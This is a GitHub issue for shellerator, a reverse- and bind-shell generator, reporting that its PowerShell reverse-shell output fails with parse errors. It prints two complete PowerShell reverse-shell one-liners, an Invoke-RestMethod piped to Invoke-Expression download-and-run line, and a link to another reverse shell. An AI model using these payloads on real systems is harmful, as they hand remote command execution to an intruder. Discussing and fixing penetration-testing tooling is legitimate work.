search

ShutdownRepo / shellerator

Simple CLI tool for the generation of bind and reverse shells in multiple languages
GNU General Public License v3.0
359 stars 50 forks source link

[BUG] Powershell reverseshell does not work #14

Open goreil opened 2 weeks ago

goreil commented 2 weeks ago

Both generated powershell reverse shells do not work:

I used the following command to generate the reverse shells:

# shellerator  --type powershell --lport 443 --lhost 127.0.0.1

[1] powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("127.0.0.1",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

[2] powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

CLI command used
/root/.local/bin/shellerator --reverse-shell --type powershell --lhost 127.0.0.1 --lport 443

Running them on a windows host yields a lot of syntax errors:

> Invoke-RestMethod '127.0.0.1/rev1.ps1' | Invoke-Expression
At line:1 char:75
+ ...  System.Net.Sockets.TCPClient('127.0.0.1',443); = .GetStream();[byte[ ...
+                                                                  ~
An expression was expected after '('.
At line:1 char:122
+ ...  = .GetStream();[byte[]] = 0..65535|%{0};while(( = .Read(, 0, .Length ...
+                                                                  ~
Missing expression after ','.
At line:1 char:123
+ ... tream();[byte[]] = 0..65535|%{0};while(( = .Read(, 0, .Length)) -ne 0 ...
+                                                           ~~~~~~~
Unexpected token '.Length' in expression or statement.
At line:1 char:122
+ ...  = .GetStream();[byte[]] = 0..65535|%{0};while(( = .Read(, 0, .Length ...
+                                                                  ~
Missing closing ')' in expression.
At line:1 char:132
+ ... eam();[byte[]] = 0..65535|%{0};while(( = .Read(, 0, .Length)) -ne 0){ ...
+                                                                  ~
Missing statement body in while loop.
At line:1 char:138
+ ... byte[]] = 0..65535|%{0};while(( = .Read(, 0, .Length)) -ne 0){; = (Ne ...
+                                                                 ~
Unexpected token ')' in expression or statement.
At line:1 char:203
+ ... = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(,0, ); = ...
+                                                                  ~
Missing ')' in method call.
At line:1 char:206
+ ... New-Object -TypeName System.Text.ASCIIEncoding).GetString(,0, ); = (i ...
+                                                                  ~
Missing expression after ',' in pipeline element.
At line:1 char:139
+ ... yte[]] = 0..65535|%{0};while(( = .Read(, 0, .Length)) -ne 0){; = (New ...
+                                                                 ~
Missing closing '}' in statement block or type definition.
At line:1 char:207
+ ... w-Object -TypeName System.Text.ASCIIEncoding).GetString(,0, ); = (iex ...
+                                                                 ~
Unexpected token ')' in expression or statement.
Not all parse errors were reported.  Correct the reported errors and try again.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ExpectedExpression

Fix: Use a working reverse shell like this one:

https://gist.githubusercontent.com/egre55/c058744a4240af6515eb32b2d33fbed3/raw/3ad91872713d60888dca95850c3f6e706231cb40/powershell_reverse_shell.ps1

ShutdownRepo commented 2 weeks ago

Hello, thank you for raising the issue However I don't have the time to implement the fix I'd be happy to review and merge a pull request đŸ˜‰